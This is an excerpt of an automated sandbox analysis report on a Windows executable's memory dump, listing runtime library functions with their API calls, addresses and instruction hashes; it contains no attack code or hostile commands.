                                                                                                                                                                      • Opcode Fuzzy Hash: f19c406f68e5b55e61e82716ca93a81777c36e173ab4f025d0dcb92144516b81
                                                                                                                                                                      • Instruction Fuzzy Hash: C541EEA2B18E8981EE54EEA691043BDAB91AB44BE0F984532DBBD577D1DE3CE040C310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7C1B4, Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                      • Opcode ID: f0ddef62cf4af00b7afe36782bcc538dcc0aa40ad8084fc7657064176c5912d5
                                                                                                                                                                      • Instruction ID: 79c879d8113177c74a29c8572d8e13196e81ffe8358748c13159ea86e670fb9c
                                                                                                                                                                      • Opcode Fuzzy Hash: f0ddef62cf4af00b7afe36782bcc538dcc0aa40ad8084fc7657064176c5912d5
                                                                                                                                                                      • Instruction Fuzzy Hash: 8531A521A18A4685D7A4DB949580278BA90FB45BA0FA4033BDB6E273F0CF38E551C316
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D67930, Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1173176844-0
                                                                                                                                                                      • Opcode ID: 70ba62f8a97dc7050fa898f7d0c2f8790c8e7e4e5b6d22f14cc08e110f66fe0c
                                                                                                                                                                      • Instruction ID: 03e49e8fd1f83a7c58b34435c5193831bb166d8b458db37b9867f49be0b0bc30
                                                                                                                                                                      • Opcode Fuzzy Hash: 70ba62f8a97dc7050fa898f7d0c2f8790c8e7e4e5b6d22f14cc08e110f66fe0c
                                                                                                                                                                      • Instruction Fuzzy Hash: F7E0EC80E1990B45F9D8B1E214163B489808F05371EA81B33D97F242C7FD3DA8568532
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D71FA4, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: e425f939b461e09f0642d912a4c298c6d0487223980a7e59e57d9a8a5d610ba6
                                                                                                                                                                      • Instruction ID: eedc824f900a8d1d84055f7c162a3391715c2b0073d7fa1c11ae7ab0b50ab25f
                                                                                                                                                                      • Opcode Fuzzy Hash: e425f939b461e09f0642d912a4c298c6d0487223980a7e59e57d9a8a5d610ba6
                                                                                                                                                                      • Instruction Fuzzy Hash: E1218032E04B4189FBA0EFA4C4443FD7AA0FB04709F84453AD60D23A85DF78D595CBA1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7FAB4, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 5a7425f769f0ef5d05a00a5751305ae3355cb41b9d71f6080b861222f13c97f2
                                                                                                                                                                      • Instruction ID: 965952c1007ee229a41bc5da5aab32d6eb080e29b4c576b91684b88ffa9c8721
                                                                                                                                                                      • Opcode Fuzzy Hash: 5a7425f769f0ef5d05a00a5751305ae3355cb41b9d71f6080b861222f13c97f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 46119D3291D64282E2A1EF91E480639FBA8FF80741F950436E66C67796CF3CE8108762
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D73B9C, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 01e56fbe2c04021743b4b0bec21fb57d2ee28b38409af7f033e8060478c12aef
                                                                                                                                                                      • Instruction ID: 78b30512ad538fc0be5bd65c4bb96a344f310cb6e1dc199f1103afd8872cf965
                                                                                                                                                                      • Opcode Fuzzy Hash: 01e56fbe2c04021743b4b0bec21fb57d2ee28b38409af7f033e8060478c12aef
                                                                                                                                                                      • Instruction Fuzzy Hash: 0211D632A14B569DEB51EFA0D4813EC3BB4FB04358F900636EA4D26B59DF34D155C3A1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7AD8C, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7E3D7AC55,?,?,8000000000000000,00007FF7E3D76A2D,?,?,?,?,00007FF7E3D7AE29), ref: 00007FF7E3D7ADE1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: fe3263e8e25c2df92887862d28651b12063e121c712c013a3fb717dcdb45fcec
                                                                                                                                                                      • Instruction ID: 97d12d3ccc7364914c0f88e354693b3c7a5f9ca9df200da95f9fadfb0b34b41d
                                                                                                                                                                      • Opcode Fuzzy Hash: fe3263e8e25c2df92887862d28651b12063e121c712c013a3fb717dcdb45fcec
                                                                                                                                                                      • Instruction Fuzzy Hash: BCF04F14B4920281FFD5F7E199513F5DA945F88782F8C5037E80EA6782FE3CA8858232
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7AE44, Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: 98cfb659ee49064f92ea23b4e398555ef07566d909c29a49e897d9c8b33d77a1
                                                                                                                                                                      • Instruction ID: 4a3cefd3719a5f7259072fd6719f12d0da49387dbadaad05b323c650d3630072
                                                                                                                                                                      • Opcode Fuzzy Hash: 98cfb659ee49064f92ea23b4e398555ef07566d909c29a49e897d9c8b33d77a1
                                                                                                                                                                      • Instruction Fuzzy Hash: D1F05405F6824245FBD5F7E154413B5DA804F447A2F885632EC3D653C1EE3CA4804233
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D8BBD0, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3527080286-0
                                                                                                                                                                      • Opcode ID: 341e8ee344b5f2fdde741966d8bcbf607ed47ed757ea4cefe913e01fcc8f9455
                                                                                                                                                                      • Instruction ID: 8802010ae393dcbe948d3c94605faceaddbb3aef77a2c8f808eee00b99baf73c
                                                                                                                                                                      • Opcode Fuzzy Hash: 341e8ee344b5f2fdde741966d8bcbf607ed47ed757ea4cefe913e01fcc8f9455
                                                                                                                                                                      • Instruction Fuzzy Hash: 67E0BF25E09A0680EAD5F78AE884334EA50BF59740BD00473C41E26364DE3DB4998327
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FF7E3D81A90, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7AA7C: GetLastError.KERNEL32(?,?,?,00007FF7E3D6FD01,?,?,7FFFFFFFFFFFFFFF,00007FF7E3D61C2A), ref: 00007FF7E3D7AA8B
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7AA7C: SetLastError.KERNEL32(?,?,?,00007FF7E3D6FD01,?,?,7FFFFFFFFFFFFFFF,00007FF7E3D61C2A), ref: 00007FF7E3D7AB29
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF7E3D81AFD
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF7E3D81B38
                                                                                                                                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF7E3D7386C), ref: 00007FF7E3D81B7D
                                                                                                                                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF7E3D7386C), ref: 00007FF7E3D81BA5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                      • API String ID: 2136749100-905460609
                                                                                                                                                                      • Opcode ID: 908a6b83db4800547fb9010b45ec8f8f957cca1a06787f528ca73239330b9321
                                                                                                                                                                      • Instruction ID: ee04dfdd548a60db9758c08f0abceea5c2b3cb8be1d573c6968e8f1aa39aeeb5
                                                                                                                                                                      • Opcode Fuzzy Hash: 908a6b83db4800547fb9010b45ec8f8f957cca1a06787f528ca73239330b9321
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B919432A0878281E7A4FFA5D4413B9AB64EB44B84F844133DA4D6B795EF3CF559C322
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D824C4, Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3939093798-0
                                                                                                                                                                      • Opcode ID: f790281d0b45084633252d64efd2133bc657d527af11988ede220f6fc86663f8
                                                                                                                                                                      • Instruction ID: 15f9f5918b744282a2e5afb74dfa69a6c6341cb6cbd7d2347757508bfd395b8f
                                                                                                                                                                      • Opcode Fuzzy Hash: f790281d0b45084633252d64efd2133bc657d527af11988ede220f6fc86663f8
                                                                                                                                                                      • Instruction Fuzzy Hash: AA719262F046428AFB95EFA5D4507B8BBB4BF48744F844036CA4D6B695EF3CB445C322
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D68064, Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: dd01e66c30db8e9f87cd60ad336a0cb77522f9690efad85c2707880cc22c2aab
                                                                                                                                                                      • Instruction ID: 7f05843409667fbd5702430dffcc491c018075e899853676e77357337a5c1df9
                                                                                                                                                                      • Opcode Fuzzy Hash: dd01e66c30db8e9f87cd60ad336a0cb77522f9690efad85c2707880cc22c2aab
                                                                                                                                                                      • Instruction Fuzzy Hash: EF314F72609F8185EBA0DFA1E8403F9B764FB84748F84443ADA4D57A98DF3CD558C721
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6FEC8, Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      • Opcode ID: e738eda3dbc1fab1b558436e85e0f414863e30d97480f66e19cff1ca9febbf30
                                                                                                                                                                      • Instruction ID: 707b571dcd0a5bb0a6e985909fdd1d95c9befd0f4714724542c3866ecc5893ea
                                                                                                                                                                      • Opcode Fuzzy Hash: e738eda3dbc1fab1b558436e85e0f414863e30d97480f66e19cff1ca9febbf30
                                                                                                                                                                      • Instruction Fuzzy Hash: 4131B632608F8185D7A0DF65E8403AEB7A4FB88798F900136EA9D57B98DF3CD155CB11
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D82B4C, Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1443284424-0
                                                                                                                                                                      • Opcode ID: a3ee30757392479f5a7cce126f2a8e91cadbc6b924d7436d729ce31afda1fd9e
                                                                                                                                                                      • Instruction ID: 6d2dc005dc4e8f4b85c94821e0c3b9c9882252954f6a36c7c8544241f485ef0f
                                                                                                                                                                      • Opcode Fuzzy Hash: a3ee30757392479f5a7cce126f2a8e91cadbc6b924d7436d729ce31afda1fd9e
                                                                                                                                                                      • Instruction Fuzzy Hash: 70E11672B08A819AE741DFA5D0402ADBF71FB44788F804132EF4E6BB99DE38E516C311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D63C20, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 497COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: %
                                                                                                                                                                      • API String ID: 3668304517-2567322570
                                                                                                                                                                      • Opcode ID: 8a66d5076b83e9d492563f899b77351946d8774d763da9b8404ba780dddf6097
                                                                                                                                                                      • Instruction ID: 69f8dc4d4b436bce3563b1c4e507c9e4bae6919806044c399ba986166ceb6397
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a66d5076b83e9d492563f899b77351946d8774d763da9b8404ba780dddf6097
                                                                                                                                                                      • Instruction Fuzzy Hash: 48124522B08E8589FB65DBA5D4003FDAB71EB54788F844132EE5D27B99DF3CD4448361
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7EF2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocaletry_get_function
                                                                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                                                                      • API String ID: 2200034068-2904428671
                                                                                                                                                                      • Opcode ID: eee715fbac3006e22b13ca4ea214737d10d3c8228fae26dd80626aacc3aa4420
                                                                                                                                                                      • Instruction ID: 2999c04bd46463fb8c08ae33d61560b473931b762db3ee3b5feec9deccb06514
                                                                                                                                                                      • Opcode Fuzzy Hash: eee715fbac3006e22b13ca4ea214737d10d3c8228fae26dd80626aacc3aa4420
                                                                                                                                                                      • Instruction Fuzzy Hash: 19018625B08B4181E780FB99B8406A9EB64FF84BD0F984037EE4C67BA5CE3CE9518355
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7F29C, Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F2B7
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F2D6
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7EA28: GetProcAddress.KERNEL32(?,?,00000005,00007FF7E3D7EF06,?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D), ref: 00007FF7E3D7EB80
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F2F5
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7EA28: LoadLibraryW.KERNELBASE(?,?,00000005,00007FF7E3D7EF06,?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D), ref: 00007FF7E3D7EACB
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7EA28: GetLastError.KERNEL32(?,?,00000005,00007FF7E3D7EF06,?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D), ref: 00007FF7E3D7EAD9
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7EA28: LoadLibraryExW.KERNEL32(?,?,00000005,00007FF7E3D7EF06,?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D), ref: 00007FF7E3D7EB1B
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F314
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7EA28: FreeLibrary.KERNEL32(?,?,00000005,00007FF7E3D7EF06,?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D), ref: 00007FF7E3D7EB54
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F333
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F352
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F371
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F390
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F3AF
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F3CE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
